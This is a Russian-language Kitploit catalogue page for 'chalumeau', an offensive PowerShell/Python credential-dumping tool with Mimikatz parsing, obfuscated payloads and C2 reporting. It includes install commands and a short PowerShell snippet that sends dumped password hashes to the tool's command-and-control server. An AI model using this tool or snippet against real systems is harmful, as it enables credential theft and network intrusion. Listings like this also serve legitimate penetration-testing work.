Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
chalumeau — Chalumeau — это автоматизированный, расширяемый и настраиваемый инструмент для извлечения учетных данных, основанный на PowerShell и Python | Kitploit
Инструменты/GitHubGitHub/cyberstruggle/chalumeau
Атаки на ПаролиПост-эксплуатацияТестирование на ПроникновениеКомандование и УправлениеRed TeamingРазработка Полезной Нагрузки
GitHubcyberstruggle/chalumeau

chalumeau

Chalumeau — это автоматизированный, расширяемый и настраиваемый инструмент для извлечения учетных данных, основанный на PowerShell и Python

Репозиторий
102196 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться


Chalumeau

Chalumeau - это автоматизированный, расширяемый и настраиваемый инструмент для извлечения учетных данных на основе PowerShell и Python.

Основные возможности

  • Создавайте свои собственные пейлоады
  • Выполнение в памяти
  • Извлечение списка паролей
  • Панель отчетов / Веб-интерфейс
  • Парсинг Mimikatz
  • Извлечение билетов

Скриншоты


Известные проблемы

  • Парсинг dcsync Mimikatz (работаем над исправлением)
  • Обход антивирусов и EDR, вам нужно будет поддерживать свои пейлоады

Планируется

  • Зашифрованное взаимодействие
  • Автоматическое боковое перемещение
  • Автоматический перебор паролей
  • Автоматический взлом хешей

Использование

root@kitploit:~
git clone https://github.com/cyberstruggle/chalumeau.git
cd chalumeau/
chmod +x install.sh
sudo ./install.sh

# Запуск
chmod +x start.sh

sudo ./start.sh

Создание собственного пейлоада

Запутывайте свой собственный PowerShell пейлоад для извлечения учетных данных и используйте вызов функции chalumeau без каких-либо импортов. chalumeau зашифрует и свяжется с C2 и отправит извлеченные учетные данные. Просто сохраните файл в каталоге chalumeau-power/payloads.

  • Использование функции ChalumeauSendCredentials
    • ChalumeauSendCredentials
      • Secret = извлеченный хеш или пароль в открытом виде (строка)
      • Username = имя пользователя или идентификатор извлеченных учетных данных (строка)
      • IsClearText = 1, если это открытый текст, 0 если нет (целое число)
      • Source = укажите источник пейлоада, например "Mimikatz Hash" (строка)
root@kitploit:~
# Custom Payload Example
# $DumpedHashes is array of dumped hashes from the local machine
foreach ($hash in $DumpedHashes){
    ChalumeauSendCredentials -Secret $hash.secret -Username $hash.user -IsClearText 0 -source "My custom payload"
} 

Благодарности

  • wazehell Автор
  • Invoke-Obfuscation Daniel Bohannon
  • Invoke-Mimikatz PowerSploit
  • Get-PassHashes nishang
  • Chalumeau Logo Aureliano
  • Invoke-MassMimikatz PowerTools
Скачать инструмент